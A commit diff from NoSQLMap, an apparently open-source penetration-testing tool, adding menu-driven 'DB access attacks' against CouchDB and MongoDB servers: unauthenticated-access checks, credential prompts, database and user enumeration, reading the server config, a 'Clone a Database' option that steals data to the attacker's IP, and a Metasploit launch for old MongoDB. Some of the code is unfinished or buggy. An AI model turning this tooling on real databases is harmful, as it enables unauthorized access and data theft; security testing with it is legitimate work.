Finish CouchDB Scanner and NetAttacks start

Author: tcstool

nosqlmap.py

@@ -1646,7 +1646,7 @@ def massScan():
 			result = accessCheck(target.rstrip(),27017,ping)
 
 		elif platform == "CouchDB":
-			result = nsmcouch.couchScan(target.rstrip,5984,ping)
+			result = nsmcouch.couchScan(target.rstrip(),5984,ping)
 
 		if result[0] == 0:
 			print "Successful default access on " + target.rstrip() + "(" + platform + " Version: " + result[1] + ")."

nsmcouch.py

@@ -1,6 +1,22 @@
 #!/usr/bin/python
+#NoSQLMap Copyright 2014 Russell Butturini
+#This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+#the Free Software Foundation, either version 3 of the License, or
+#(at your option) any later version.
+
+#This program is distributed in the hope that it will be useful,
+#but WITHOUT ANY WARRANTY; without even the implied warranty of
+#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#GNU General Public License for more details.
+
+#You should have received a copy of the GNU General Public License
+#along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+
 
 import couchdb
+import urllib
 
 
 def couchScan(target,port,pingIt):
@@ -9,7 +25,7 @@ def couchScan(target,port,pingIt):
 
         if test == 0:	
             try:
-                conn = couchdb.Server("http://" + str(target) + ":5984/")
+                conn = couchdb.Server("http://" + str(target) + ":5984/", timeout=4000)
 
                 try:
                     dbVer = conn.version()
@@ -18,12 +34,10 @@ def couchScan(target,port,pingIt):
                 except couchdb.http.Unauthorized:
                     return [1,None]
 
-                except Exception, e:
-                    print e
+                except:
                     return [2,None]
 
-            except Exception, e:
-                print e
+            except:
                 return [3,None]
 
         else:
@@ -32,21 +46,110 @@ def couchScan(target,port,pingIt):
     else:
         try:
             conn = couchdb.Server("http://" + str(target) + ":5984/")
-            print target #debug
-            
 
             try:
-                print str(conn) #debug
                 dbVer = conn.version()
                 return [0,dbVer]
 
             except couchdb.http.Unauthorized:
                 return [1,None]
 
-            except Exception, e:
-                print e
+            except:
                 return [2,None]
 
-        except Exception, e:
-            print e
-            return [3,None]
+        except:
+            return [3,None]
+        
+        
+def netAttacks(target,port):
+    print "DB Access attacks (CouchDB)"
+    print "======================"
+    mgtOpen = False
+    webOpen = False
+    mgtSelect = True
+    #This is a global for future use with other modules; may change
+    dbList = []
+    
+    print "Checking to see if credentials are needed..."
+    needCreds = couchScan(target,port,False)
+
+    if needCreds[0] == 0:
+        conn = couchdb.Server("http://" + str(target) + ":5984/")
+        print "Successful access with no credentials!"
+        mgtOpen = True
+
+    elif needCreds[0] == 1:
+            print "Login required!"
+            srvUser = raw_input("Enter server username: ")
+            srvPass = raw_input("Enter server password: ")
+            uri = "http://" + srvUser + ":" + srvPass + "@" + target + ":5984/"
+            
+            try:
+                conn = couchdb.server(uri)
+                print "CouchDB authenticated on " + target + ":5984!"
+                mgtOpen = True
+
+            except:
+                raw_input("Failed to authenticate.  Press enter to continue...")
+                return
+    
+    elif needCreds[0] == 2:
+        couchdb.Server("http://" + str(target) + ":5984/")
+        print "Access check failure.  Testing will continue but will be unreliable."
+        mgtOpen = True
+
+    elif needCreds[0] == 3:
+        print "Couldn't connect to CouchDB server."
+        return
+
+	
+    mgtUrl = "http://" + target + ":5984/_utils"	
+    #Future rev:  Add web management interface parsing
+    try:
+        mgtRespCode = urllib.urlopen(mgtUrl).getcode()
+        if mgtRespCode == 200:
+            print "Sofa web management open at " + mgtUrl + ".  No authentication required!"
+
+    except:
+        print "MongoDB web management closed or requires authentication."
+    
+    if mgtOpen == True:
+        while mgtSelect:
+            print "\n"
+            print "1-Get Server Version and Platform"
+            print "2-Enumerate Databases/Collections/Users"
+            print "3-Check for Attachments"
+            print "4-Clone a Database"
+            print "5-Return to Main Menu"
+            attack = raw_input("Select an attack: ")
+
+            if attack == "1":
+                print "\n"
+                getPlatInfo(conn)
+                
+            if attack == "2":
+                print "\n"
+                enumDbs(conn)
+
+            if attack == "3":
+                print "\n"
+                enumGrid(conn)
+                
+            if attack == "4":
+                if optionSet[4] == False:
+                    print "Target database not set!"
+
+                else:
+                    print "\n"
+                    stealDBs(myIP,conn)
+
+            if attack == "6":
+                    return
+                
+def getPlatInfo(couchConn):
+    	print "Server Info:"
+        print "CouchDB Version: " + couchConn.version()
+        print "Configuration File:\n"
+        print str(urllib.urlopen("http://" + target + ":5984/_config"))
+        print "\n"
+        return

nsmmongo.py

@@ -0,0 +1,128 @@
+#!/usr/bin/python
+#NoSQLMap Copyright 2014 Russell Butturini
+#This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+#the Free Software Foundation, either version 3 of the License, or
+#(at your option) any later version.
+
+#This program is distributed in the hope that it will be useful,
+#but WITHOUT ANY WARRANTY; without even the implied warranty of
+#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#GNU General Public License for more details.
+
+#You should have received a copy of the GNU General Public License
+#along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import pymongo
+import urllib
+
+def netAttacks(target, port):
+	print "DB Access attacks (MongoDB)"
+	print "================="
+	mgtOpen = False
+	webOpen = False
+	mgtSelect = True
+	#This is a global for future use with other modules; may change
+	global dbList
+	global dbPort
+	dbList = []
+	
+	print "Checking to see if credentials are needed..."
+	needCreds = accessCheck(target,dbPort,False)
+	
+	if needCreds[0] == 0:
+		conn = pymongo.MongoClient(target,dbPort)
+		print "Successful access with no credentials!"
+		mgtOpen = True
+	
+	elif needCreds[0] == 1:
+		print "Login required!"
+		srvUser = raw_input("Enter server username: ")
+		srvPass = raw_input("Enter server password: ")
+		uri = "mongodb://" + srvUser + ":" + srvPass + "@" + target +"/"
+		
+		try:
+			conn = pymongo.MongoClient(target)
+			print "MongoDB authenticated on " + target + ":27017!"
+			mgtOpen = True
+		except:
+			raw_input("Failed to authenticate.  Press enter to continue...")
+			return
+	
+	elif needCreds[0] == 2:
+		conn = pymongo.MongoClient(target,dbPort)
+		print "Access check failure.  Testing will continue but will be unreliable."
+		mgtOpen = True
+	
+	elif needCreds[0] == 3:
+		print "Couldn't connect to Mongo server."
+		return
+	
+	
+	mgtUrl = "http://" + target + ":28017"	
+	#Future rev:  Add web management interface parsing
+	
+	try:
+		mgtRespCode = urllib.urlopen(mgtUrl).getcode()
+		if mgtRespCode == 200:
+			print "MongoDB web management open at " + mgtUrl + ".  No authentication required!"
+			testRest = raw_input("Start tests for REST Interface (y/n)? ")
+
+		if testRest in yes_tag:
+			restUrl = mgtUrl + "/listDatabases?text=1"
+			restResp = urllib.urlopen(restUrl).read()
+			restOn = restResp.find('REST is not enabled.')
+
+			if restOn == -1:
+				print "REST interface enabled!"
+				dbs = json.loads(restResp)
+				menuItem = 1
+				print "List of databases from REST API:"
+
+				for x in range(0,len(dbs['databases'])):
+					dbTemp= dbs['databases'][x]['name']
+					print str(menuItem) + "-" + dbTemp
+					menuItem += 1
+			else:
+				print "REST interface not enabled."
+			print "\n"
+
+	except:		
+		print "MongoDB web management closed or requires authentication."	
+		
+	if mgtOpen == True:
+		
+		while mgtSelect:
+			print "\n"
+			print "1-Get Server Version and Platform"
+			print "2-Enumerate Databases/Collections/Users"
+			print "3-Check for GridFS"
+			print "4-Clone a Database"
+			print "5-Launch Metasploit Exploit for Mongo < 2.2.4"
+			print "6-Return to Main Menu"
+			attack = raw_input("Select an attack: ")
+	
+			if attack == "1":
+				print "\n"
+				getPlatInfo(conn)
+			
+			if attack == "2":
+				print "\n"
+				enumDbs(conn)
+			
+			if attack == "3":
+				print "\n"
+				enumGrid(conn)
+			
+			if attack == "4":
+				if optionSet[4] == False:
+					print "Target database not set!"
+				else:
+					print "\n"
+					stealDBs(myIP,conn)
+			
+			if attack == "5":
+				print "\n"
+				msfLaunch()
+			
+			if attack == "6":
+				return

setup.sh

@@ -1,4 +1,18 @@
 #!/bin/bash
+#NoSQLMap Copyright 2014 Russell Butturini
+#This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+#the Free Software Foundation, either version 3 of the License, or
+#(at your option) any later version.
+
+#This program is distributed in the hope that it will be useful,
+#but WITHOUT ANY WARRANTY; without even the implied warranty of
+#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#GNU General Public License for more details.
+
+#You should have received a copy of the GNU General Public License
+#along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
 echo "This setup script will install pip and use it to load the necessary Python dependencies for NoSQLMap on Red Hat and Debian based systems."
 echo "It is EXPERIMENTAL and messes with your system.   Use at your own risk!!!"
 echo "As far as installing Metasploit, you're on your own."